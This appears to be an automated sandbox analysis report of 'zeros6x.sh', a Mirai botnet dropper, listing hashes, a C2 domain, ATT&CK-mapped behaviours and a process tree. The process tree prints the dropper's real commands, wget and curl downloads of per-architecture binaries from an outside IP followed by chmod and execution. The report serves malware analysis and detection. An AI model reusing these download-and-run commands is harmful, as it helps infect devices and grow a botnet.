Analysis
-
max time kernel
149s -
max time network
148s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
15-11-2024 03:57
Static task
static1
Behavioral task
behavioral1
Sample
zeros6x.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
zeros6x.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
zeros6x.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
zeros6x.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
zeros6x.sh
-
Size
2KB
-
MD5
642df6d1dacbef4e6df51eb185893408
-
SHA1
b5536f3af73f31a31bda2bbf6467a28eb14bd50a
-
SHA256
c58d8c70b82f2ecb99af380bd00a926428a5883dc910edc92dea36c44bce8eab
-
SHA512
7deb4c9a41575f1f0092b9430909ce93ccd7273f8900b4dafbd750cbe5926d559a6666dc629611de0db4a33a5c8ab5c9811a783835ae87479f02f45fdfb8a629
Malware Config
Extracted
mirai
UNSTABLE
server.myway-ing.win
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
server.myway-ing.win
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 742 chmod 759 chmod 807 chmod 831 chmod 687 chmod 709 chmod 725 chmod 820 chmod 826 chmod 837 chmod 695 chmod 769 chmod 814 chmod -
Deletes itself 2 IoCs
Processes:
WTHWTHpid process 727 WTH 770 WTH -
Executes dropped EXE 13 IoCs
Processes:
WTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHioc pid process /tmp/WTH 688 WTH /tmp/WTH 696 WTH /tmp/WTH 710 WTH /tmp/WTH 727 WTH /tmp/WTH 743 WTH /tmp/WTH 760 WTH /tmp/WTH 770 WTH /tmp/WTH 808 WTH /tmp/WTH 815 WTH /tmp/WTH 821 WTH /tmp/WTH 827 WTH /tmp/WTH 832 WTH /tmp/WTH 838 WTH -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
WTHWTHdescription ioc process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
Processes:
WTHdescription ioc process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
Processes:
WTHWTHdescription ioc process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
Changes its process name 2 IoCs
Processes:
WTHWTHdescription ioc pid process Changes the process name, possibly in an attempt to hide itself 477101kavce3 727 WTH Changes the process name, possibly in an attempt to hide itself vmv0c2wtv7wle1eu 770 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
WTHdescription ioc process File opened for reading /proc/net/tcp WTH -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlcatWTHpid process 691 wget 693 curl 694 cat 696 WTH -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetcurlwgetcurlwgetwgetcurlcurlcurlcurlwgetzeros6x.shwgetcurlcurlcurlcurlwgetcurlcurlwgetcurlwgetdescription ioc process File opened for modification /tmp/zmap.m68k wget File opened for modification /tmp/zmap.spc wget File opened for modification /tmp/zmap.sh4 wget File opened for modification /tmp/zmap.mpsl curl File opened for modification /tmp/zmap.arm wget File opened for modification /tmp/zmap.arm curl File opened for modification /tmp/zmap.arm5 wget File opened for modification /tmp/zmap.arm6 wget File opened for modification /tmp/zmap.ppc curl File opened for modification /tmp/zmap.m68k curl File opened for modification /tmp/zmap.i686 curl File opened for modification /tmp/zmap.mips curl File opened for modification /tmp/zmap.mpsl wget File opened for modification /tmp/WTH zeros6x.sh File opened for modification /tmp/zmap.mips wget File opened for modification /tmp/zmap.arm5 curl File opened for modification /tmp/zmap.arm7 curl File opened for modification /tmp/zmap.spc curl File opened for modification /tmp/zmap.sh4 curl File opened for modification /tmp/zmap.x86 wget File opened for modification /tmp/zmap.x86 curl File opened for modification /tmp/zmap.arc curl File opened for modification /tmp/zmap.ppc wget File opened for modification /tmp/zmap.arm6 curl File opened for modification /tmp/zmap.arm7 wget
Processes
-
/tmp/zeros6x.sh/tmp/zeros6x.sh1⤵
- Writes file to tmp directory
PID:655 -
/usr/bin/wgetwget http://154.216.16.71/zmap.x862⤵
- Writes file to tmp directory
PID:661
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676
-
-
/bin/catcat zmap.x862⤵PID:685
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.x862⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/WTH./WTH ssh.x862⤵
- Executes dropped EXE
PID:688
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:691
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:693
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
PID:694
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/WTH./WTH ssh.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:696
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.mpsl2⤵
- Writes file to tmp directory
PID:698
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701
-
-
/bin/catcat zmap.mpsl2⤵PID:708
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/WTH./WTH ssh.mpsl2⤵
- Executes dropped EXE
PID:710
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm2⤵
- Writes file to tmp directory
PID:713
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/catcat zmap.arm2⤵PID:724
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/WTH./WTH ssh.arm2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:727
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm52⤵
- Writes file to tmp directory
PID:729
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/catcat zmap.arm52⤵PID:740
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/WTH./WTH ssh.arm52⤵
- Executes dropped EXE
PID:743
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm62⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/catcat zmap.arm62⤵PID:757
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/WTH./WTH ssh.arm62⤵
- Executes dropped EXE
PID:760
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm72⤵
- Writes file to tmp directory
PID:761
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/catcat zmap.arm72⤵PID:768
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/WTH./WTH ssh.arm72⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:770
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.ppc2⤵
- Writes file to tmp directory
PID:802
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/catcat zmap.ppc2⤵PID:806
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/WTH./WTH ssh.ppc2⤵
- Executes dropped EXE
PID:808
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.m68k2⤵
- Writes file to tmp directory
PID:810
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/catcat zmap.m68k2⤵PID:813
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/WTH./WTH ssh.m68k2⤵
- Executes dropped EXE
PID:815
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.spc2⤵
- Writes file to tmp directory
PID:817
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/catcat zmap.spc2⤵PID:819
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/WTH./WTH ssh.spc2⤵
- Executes dropped EXE
PID:821
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.i6862⤵PID:823
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/catcat zmap.i6862⤵PID:825
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/WTH./WTH ssh.i6862⤵
- Executes dropped EXE
PID:827
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.sh42⤵
- Writes file to tmp directory
PID:828
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/catcat zmap.sh42⤵PID:830
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/WTH./WTH ssh.sh42⤵
- Executes dropped EXE
PID:832
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arc2⤵PID:834
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/catcat zmap.arc2⤵PID:836
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/WTH./WTH ssh.arc2⤵
- Executes dropped EXE
PID:838
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD5192b6eb8dcf1ad172064c832fbb47b92
SHA1a2af8812f96d0748f3a119a4419ff65dcffb179c
SHA256a97f5317845c7053e64d0d8d5e076532de7a2c98189eb7304b8e0e742e61e93d
SHA5127ad2efc28832cf1312c00bccf6866669938b0f4787999b7112f750377aa5582b8c508bedba29f482dadceb6a1c3868ce87220cdded44399a1cd325ab9bfd7e9a
-
Filesize
94KB
MD5b4458e4fa2efcf88bfa2aaeda864519e
SHA18263798736379ed4ce23ef75e4d1f606e05c815b
SHA256146ef07d918f77546ba8112e9f307361f9d54af4886dba7fc4ba9e58bc8c5d47
SHA5124aa6068f6e3ed09c6706c37f046cd4081a5c7de3e307860e67ff9fff426a281f33dbb027bbcb36b0fd9df6dccd083308d78f43948009ccdcc3676ed4ff063010
-
Filesize
74KB
MD58a666a51d2aeb8e106c7c9a302aa3acb
SHA1c222cd4760966db8f2461c4dc034f9f3fe912eb2
SHA2567b6c76af31adf965e62b5c726ea382825eb5f2aefc7e7331b192e0d4c809fe46
SHA512b48dd376f4e801bd6ea3351a1726a45d1b895f25f534d9d211b1023195881211f3b52f02914317899f122d71b88775e912f6092e5fe7d83565b3fd23012a04ac
-
Filesize
49KB
MD5803219db4e5384144e86c388e558a530
SHA1c8cb8ec327c2a53a6a5fa42d8c2886161defff89
SHA2560edc353b0bc96801a0a2d654427c9f51991f3500a3a43070d9c5828efadd352e
SHA512ccc7ee4ea8f672dd7d8df15e809b6cd9250ec80c0edbd929f0f8ab794c07bcf6ca7aade1f47898348b999f729b1ed6b47d4abed73eb8d2c94eac023fd5cf6332
-
Filesize
152KB
MD504bd1585a8ca785193b158d27307e80b
SHA120faf0e3c7f878f134142f71c9f5b7d58ce5ab17
SHA256272f6e7e0d6dd601ef8110959bc6907cf4531a87fc3e6a5b3ab7d32d1fa3d2ee
SHA512d92b33a37dbd627faaf48ed65f785191ea8fccb104e15801d64160885e6244a7a98bc17ae1a5eb9e0c9d7f4b5f807174c2aff30d7235be4e8a19b271cd1fc2f2
-
Filesize
61KB
MD58edb75406d233f4201e85fd2d746c114
SHA179272fc7bf16c8f354efa0b4b59bcdf0f929fa0a
SHA256e1f60f41d27140942ad74ef1f1bae26fc98787fed03c91d3c4a33e5390b6d3be
SHA512df424a671363b4a9d6480a3210e9b135dfbce80bb9e8af7f2b931c5ba51deb8256d54b505dd418091f03c4139ccec955cc00cfeb1456e791c37d7abb5a1253c5